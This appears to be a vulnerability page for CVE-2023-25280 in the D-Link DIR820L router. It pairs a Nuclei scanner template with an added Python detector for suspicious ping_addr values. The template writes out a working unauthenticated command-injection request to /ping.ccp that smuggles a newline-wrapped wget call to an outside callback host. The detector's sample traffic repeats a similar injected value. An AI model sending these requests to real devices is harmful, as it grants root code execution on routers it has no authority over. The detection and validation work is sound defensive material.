Vulnerability description
OS Command injection vulnerability in D-Link DIR820LA1_FW105B03 allows attackers to escalate privileges to root via a crafted payload with the ping_addr parameter to ping.ccp.
id: CVE-2023-25280

info:
  name: D-Link DIR820LA1_FW105B03 'ping_addr' - OS Command Injection
  author: pussycat0x
  severity: critical
  description: |
    OS Command injection vulnerability in D-Link DIR820LA1_FW105B03 allows attackers to escalate privileges to root via a crafted payload with the ping_addr parameter to ping.ccp.
  reference:
    - https://github.com/migraine-sudo/D_Link_Vuln/tree/main/cmd%20Inject%20in%20pingV4Msg
    - https://www.dlink.com/en/security-bulletin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-25280
    cwe-id: CWE-78
    epss-score: 0.9359
    epss-percentile: 0.99832
    cpe: cpe:2.3:o:dlink:dir820la1_firmware:105b03:*:*:*:*:*:*:*
  metadata:
    vendor: dlink
    product: dir820la1_firmware
  tags: cve,cve2023,rce,unauth,kev,dlink

variables:
  payload: "wget http://{{interactsh-url}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'D-LINK')"
        condition: and
        internal: true

  - raw:
      - |
        POST /ping.ccp HTTP/1.1
        Host: {{Hostname}}
        Accept: application/xml, text/xml, */*; q=0.01
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded
        Origin: {{RootURL}}
        Referer: {{RootURL}}/lan.asp
        Cookie: hasLogin=1

        ccp_act=pingV4Msg&ping_addr=%0a{{payload}}%0a

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'http')"
          - "status_code == 200"
        condition: and
# digest: 490a00463044022076b9c593a593dc557b096f4f3ab52445d389e6c3f9fb774adc47c736b9814fe20220191f41d2d492975d60edb0e31ba968c3c7549b2be7e0161ead0d60a3a3af1f0a:922c64590222798bb761d5b6d8e72950
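The template above shows what the weak point looks like on the wire: an unauthenticated POST to /ping.ccp with ccp_act=pingV4Msg and a ping_addr value wrapped in percent-encoded newlines (%0a). The defender's counterpart is a check that the same parameter only ever carries an IPv4 address or a hostname, which is both the input validation the ping handler should have applied (CWE-78) and a usable detection rule for traffic captured in front of the device. The following Python is an added example written for this page, not code from the Nuclei template, its author, or D-Link; the request records (dicts with src, method, path and body, as a reverse proxy or IDS export might produce) and the sample traffic are constructed here, and the hostname/IPv4 allow-list is an assumed policy rather than anything the firmware is documented to enforce.

```python
"""Detect CVE-2023-25280-style requests to /ping.ccp in captured HTTP traffic.

Added example for this page; not from the Nuclei template or the vendor.
Input is a list of request dicts (constructed format: src, method, path, body).
"""
import ipaddress
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Assumed allow-list for a ping target: RFC 1123 style hostname labels
# (letters, digits, hyphens; no leading/trailing hyphen) joined by dots.
HOSTNAME_RE = re.compile(
    r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
)


def is_plain_ping_target(value: str) -> bool:
    """True only if value is a literal IPv4 address or a well-formed hostname.

    Newlines, spaces, shell metacharacters and the empty string all fail here.
    This is the validation a ping handler should perform before the value is
    handed to anything that resembles a shell.
    """
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        pass  # not an IPv4 literal; fall through to the hostname check
    return HOSTNAME_RE.fullmatch(value) is not None


def classify_request(req: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for a suspicious pingV4Msg request, or None.

    parse_qs percent-decodes the form body, so the %0a sequences seen in the
    template become real '\\n' characters in the parsed ping_addr value.
    """
    if req.get("method") != "POST":
        return None
    if req.get("path", "").split("?", 1)[0] != "/ping.ccp":
        return None
    fields = parse_qs(req.get("body", ""), keep_blank_values=True)
    if fields.get("ccp_act", [""])[0] != "pingV4Msg":
        return None
    for addr in fields.get("ping_addr", [""]):
        if not is_plain_ping_target(addr):
            return {
                "src": req.get("src", "?"),
                "reason": "ping_addr is not an IPv4 address or hostname",
                "ping_addr": addr,
                "has_newline": ("\n" in addr) or ("\r" in addr),
            }
    return None


def scan(requests: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify_request over a batch of captured requests."""
    return [f for f in (classify_request(r) for r in requests) if f is not None]


# Constructed sample traffic (not real captures): a benign IPv4 ping, a request
# shaped like the template's newline-wrapped payload, an unrelated page load,
# and a benign hostname ping.
SAMPLE_REQUESTS = [
    {"src": "10.0.0.5", "method": "POST", "path": "/ping.ccp",
     "body": "ccp_act=pingV4Msg&ping_addr=192.168.0.1"},
    {"src": "10.0.0.7", "method": "POST", "path": "/ping.ccp",
     "body": "ccp_act=pingV4Msg&ping_addr=%0awget%20http%3A%2F%2Fexample.invalid%0a"},
    {"src": "10.0.0.9", "method": "GET", "path": "/lan.asp", "body": ""},
    {"src": "10.0.0.11", "method": "POST", "path": "/ping.ccp",
     "body": "ccp_act=pingV4Msg&ping_addr=router.lan"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

Because the check is an allow-list rather than a blocklist of metacharacters, it also flags variants the template does not send (semicolons, backticks, spaces), and the `has_newline` field separates the exact %0a shape above from those other malformed values. Note that ordinary access logs usually omit POST bodies, so this needs a capture point that records the request body, such as a reverse proxy or IDS in front of the router's management interface.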